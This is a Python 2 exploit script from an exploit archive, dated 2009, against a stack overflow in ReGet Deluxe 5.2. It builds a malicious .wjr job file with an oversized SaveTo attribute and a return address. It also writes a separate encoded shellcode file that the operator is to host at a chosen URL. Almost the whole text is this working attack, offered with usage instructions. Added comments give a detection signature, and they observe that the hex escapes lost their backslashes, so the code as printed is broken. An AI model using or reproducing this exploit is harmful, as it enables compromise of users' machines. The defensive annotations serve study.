
# Title : ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit
# Published : 2009-12-25
# Author : Encrypt3d.M!nd
# Previous Title : Mini-Stream 3.0.1.1 Buffer Overflow Exploit (Meta)
# Next Title : CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3


import sys

# Python 2 script (print statements). It writes two artifacts to the current
# directory for the ReGet Deluxe 5.2 (build 330) issue named in the page
# header: a job/queue file 'devil.wjr' and a separate file 'shellcode'. The
# only user input is sys.argv[1], spliced in as the download URL.
#
# NOTE(review): every string literal below reads "x3C", "x41", ... with no
# backslash, so as shown Python stores the literal letters and digits rather
# than the bytes the author evidently intended; the escape prefixes look like
# they were dropped during extraction. The comments describe that evident
# intent, not what this text would actually emit.
#
# Defender's view: the generated .wjr is an XML job file whose single
# Download element carries one attribute value of 1,272 repeated bytes plus a
# 4-byte address. A .wjr whose attribute value is that long, or that contains
# the "Generated by ReGet Deluxe" comment together with an oversized SaveTo
# attribute, is a simple detection signature; .wjr files from untrusted
# sources should be treated as active content, not data.

print ""
print "    ReGet Deluxe 5.2 (build 330) Stack Overflow Exploit"
print "    By: Encrypt3d.M!nd                                 "
print "    http://m1nd3d.wordpress.com/                       "
print "      For Details visit my blog                        "
print ""


# One bare try/except wraps all of the work; any failure (including a missing
# argv[1]) falls through to the usage banner at the bottom.
try:

 # Hex-escaped XML for a ReGet job file: the XML prolog, a
 # "<!-- Generated by ReGet Deluxe 5.2 (build 330) -->" comment, a <ReGetJr>
 # root with settings attributes, a <Queue> and one <Download> element whose
 # Url attribute is "http://" + sys.argv[1]. The literal stops mid-attribute
 # (its tail decodes to SaveTo="), so `buff` becomes that attribute's value.
 header = (
"x3Cx3Fx78x6Dx6Cx20x76x65x72x73x69x6Fx6Ex3Dx22x31x2Ex30x22x20x65x6Ex63x6F"
"x64x69x6Ex67x3Dx22x55x54x46x2Dx38x22x20x3Fx3Ex0Dx0Ax3Cx21x2Dx2Dx20x47x65"
"x6Ex65x72x61x74x65x64x20x62x79x20x52x65x47x65x74x20x44x65x6Cx75x78x65x20"
"x35x2Ex32x20x28x62x75x69x6Cx64x20x33x33x30x29x20x2Dx2Dx3Ex0Dx0Ax3Cx52x65"
"x47x65x74x4Ax72x0Dx0Ax09x4Cx61x73x74x49x64x3Dx22x31x22x0Dx0Ax09x50x72x65"
"x64x65x66x69x6Ex65x64x43x61x74x65x67x6Fx72x69x65x73x3Dx22x31x22x0Dx0Ax09"
"x54x72x61x66x66x69x63x53x75x73x70x65x6Ex64x65x64x3Dx22x31x22x0Dx0Ax09x54"
"x72x61x66x66x69x63x43x6Fx6Fx70x65x72x61x74x69x76x65x3Dx22x32x22x0Dx0Ax09"
"x4Dx61x78x53x65x63x74x53x75x73x70x65x6Ex64x65x64x3Dx22x31x22x0Dx0Ax09x4D"
"x61x78x53x65x63x74x43x6Fx6Fx70x65x72x61x74x69x76x65x3Dx22x31x22x0Dx0Ax09"
"x4Dx61x78x53x65x63x74x55x6Ex6Cx69x6Dx69x74x65x64x3Dx22x33x22x0Dx0Ax09x53"
"x61x76x65x54x6Fx3Dx22x43x3Ax5Cx44x6Fx63x75x6Dx65x6Ex74x73x20x61x6Ex64x20"
"x53x65x74x74x69x6Ex67x73x5Cx75x6Ex6Bx6Ex6Fx77x6Ex5Cx4Dx79x20x44x6Fx63x75"
"x6Dx65x6Ex74x73x5Cx4Dx79x20x44x6Fx77x6Ex6Cx6Fx61x64x73x22x0Dx0Ax09x4Dx61"
"x78x45x72x72x6Fx72x43x6Fx75x6Ex74x3Dx22x31x30x30x22x0Dx0Ax09x54x72x79x50"
"x61x75x73x65x3Dx22x35x22x0Dx0Ax09x54x69x6Dx65x4Fx75x74x3Dx22x39x30x22x0D"
"x0Ax09x4Dx69x6Ex53x65x63x74x69x6Fx6Ex53x69x7Ax65x3Dx22x31x30x30x30x30x22"
"x0Dx0Ax09x41x75x74x6Fx53x61x76x65x52x65x73x75x6Cx74x46x69x6Cx65x3Dx22x43"
"x3Ax5Cx50x72x6Fx67x72x61x6Dx20x46x69x6Cx65x73x5Cx52x65x47x65x74x20x53x6F"
"x66x74x77x61x72x65x5Cx52x65x47x65x74x20x44x65x6Cx75x78x65x5Cx73x65x61x72"
"x63x68x2Ex78x6Dx6Cx22x0Dx0Ax09x3Ex0Dx0Ax09x3Cx51x75x65x75x65x3Ex0Dx0Ax09"
"x09x3Cx44x6Fx77x6Ex6Cx6Fx61x64x0Dx0Ax09x09x09x49x64x3Dx22x31x22x0Dx0Ax09"
"x09x09x46x69x6Cx65x4Ex61x6Dx65x3Dx22x43x3Ax5Cx44x6Fx63x75x6Dx65x6Ex74x73"
"x20x61x6Ex64x20x53x65x74x74x69x6Ex67x73x5Cx75x6Ex6Bx6Ex6Fx77x6Ex5Cx4Dx79"
"x20x44x6Fx63x75x6Dx65x6Ex74x73x5Cx4Dx79x20x44x6Fx77x6Ex6Cx6Fx61x64x73x5C"
"x61x2Ex65x78x65x22x0Dx0Ax09x09x09x53x74x61x74x65x3Dx22x33x22x0Dx0Ax09x09"
"x09x44x6Fx6Ex74x55x73x65x43x61x74x65x67x6Fx72x79x53x6Fx72x74x69x6Ex67x3D"
"x22x30x22x0Dx0Ax09x09x09x53x74x61x72x74x44x6Cx54x69x6Dx65x3Dx22x30x22x0D"
"x0Ax09x09x09x43x72x65x61x74x69x6Fx6Ex54x69x6Dx65x3Dx22x32x35x2Ex31x32x2E"
"x32x30x30x39x20x31x34x3Ax35x38x3Ax30x32x22x0Dx0Ax09x09x09x4Cx61x73x74x53"
"x74x61x72x74x54x69x6Dx65x3Dx22x30x22x0Dx0Ax09x09x09x55x72x6Cx3Dx22x68x74"
"x74x70x3Ax2Fx2F"+sys.argv[1]+"x22x0Dx0Ax09"
"x09x09x44x6Fx77x6Ex6Cx6Fx61x64x43x61x74x65x67x6Fx72x79x3Dx22x2Dx31x22x0D"
"x0Ax09x09x09x53x61x76x65x54x6Fx3Dx22")

 # The oversized attribute value: 268 filler bytes, a 4-byte value the author
 # labels as a "call edi" address for WinXP SP3, then 1000 more filler bytes
 # (1,272 bytes in total).
 buff = "x41" * 268
 buff+= "x5Fx4Dx48x7E" # call edi - winxp sp3 (friendly chars)
 buff+= "x41" * 1000

 # Closes the attribute value, adds AutoStartCreate="1", then closes the
 # Download, Queue and ReGetJr elements.
 foot = (
"x22x0Dx0Ax09x09x09x41x75x74x6Fx53x74x61x72x74x43x72x65x61x74x65x3Dx22x31"
"x22x0Dx0Ax09x09x20x2Fx3Ex0Dx0Ax09x3Cx2Fx51x75x65x75x65x3Ex0Dx0Ax3Cx2Fx52"
"x65x47x65x74x4Ax72x3Ex0Dx0A")

 # Payload file contents: 100 bytes of 0x90 padding, an encoded byte blob the
 # page does not describe, then 70,000 bytes of trailing padding. This is
 # written to 'shellcode' only and is never embedded in the .wjr.
 evil = "x90" * 100
 evil+= (
"x89xe6xd9xc7xd9x76xf4x59x49x49x49x49x49x49x49"
"x49x49x49x49x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4ax48x4cx49x43x30x43x30x45x50x45x30x4bx39"
"x4ax45x46x51x4ex32x51x74x4cx4bx46x32x44x70x4c"
"x4bx42x72x44x4cx4ex6bx43x62x42x34x4ex6bx51x62"
"x47x58x44x4fx48x37x51x5ax45x76x46x51x49x6fx45"
"x61x4fx30x4ex4cx47x4cx51x71x51x6cx45x52x46x4c"
"x47x50x4fx31x4ax6fx44x4dx45x51x4fx37x4dx32x48"
"x70x42x72x46x37x4cx4bx46x32x42x30x4ex6bx50x42"
"x45x6cx47x71x4ex30x4ex6bx51x50x51x68x4cx45x4f"
"x30x44x34x51x5ax46x61x48x50x42x70x4cx4bx50x48"
"x42x38x4cx4bx50x58x51x30x46x61x4ex33x4dx33x47"
"x4cx43x79x4cx4bx50x34x4cx4bx46x61x4ax76x46x51"
"x49x6fx44x71x49x50x4cx6cx4bx71x4ax6fx46x6dx47"
"x71x4fx37x46x58x4bx50x43x45x4ax54x43x33x43x4d"
"x4bx48x47x4bx43x4dx51x34x43x45x4bx52x42x78x4c"
"x4bx46x38x45x74x46x61x4ax73x45x36x4cx4bx46x6c"
"x50x4bx4ex6bx43x68x45x4cx46x61x4ex33x4cx4bx46"
"x64x4ex6bx43x31x4ex30x4ex69x51x54x46x44x51x34"
"x51x4bx51x4bx43x51x51x49x51x4ax50x51x49x6fx49"
"x70x51x48x51x4fx43x6ax4cx4bx42x32x4ax4bx4fx76"
"x43x6dx50x6ax47x71x4ex6dx4dx55x4ex59x47x70x43"
"x30x45x50x46x30x42x48x44x71x4ex6bx42x4fx4fx77"
"x4bx4fx4ax75x4dx6bx4dx30x45x4dx46x4ax44x4ax42"
"x48x49x36x4cx55x4dx6dx4dx4dx49x6fx4ex35x45x6c"
"x45x56x51x6cx44x4ax4bx30x4bx4bx4bx50x51x65x44"
"x45x4dx6bx50x47x44x53x42x52x50x6fx42x4ax43x30"
"x46x33x4bx4fx4ax75x42x43x50x61x50x6cx42x43x43"
"x30x41x41")

 evil+="x41" * 70000


 # The .wjr holds only the oversized attribute and the URL from argv[1]; per
 # the usage text below, the 'shellcode' file is meant to be hosted at that
 # URL by the operator -- this script does not serve it. Files are written in
 # text mode ('w'); on Windows that would translate any real 0x0A bytes.
 wjr_file=open('devil.wjr','w')
 wjr_file.write(header+buff+foot)
 wjr_file.close()
 print "[+] 'devil.wjr' Created Successfully"

 devil_file=open('shellcode','w')
 devil_file.write(evil)
 devil_file.close()
 print "[+] 'shellcode' Created Successfully"

# Bare except: every error type (missing argument, unwritable directory, ...)
# is masked behind the usage banner, so a failed write looks like a usage
# mistake.
except:
  print "###################################################"
  print " Usage: exploit.py [payload]                       "
  print "     [payload] = url to shellcode without(http://) "
  print "    Example:                                       "
  print "      exploit.py www.site.com/shellcode            "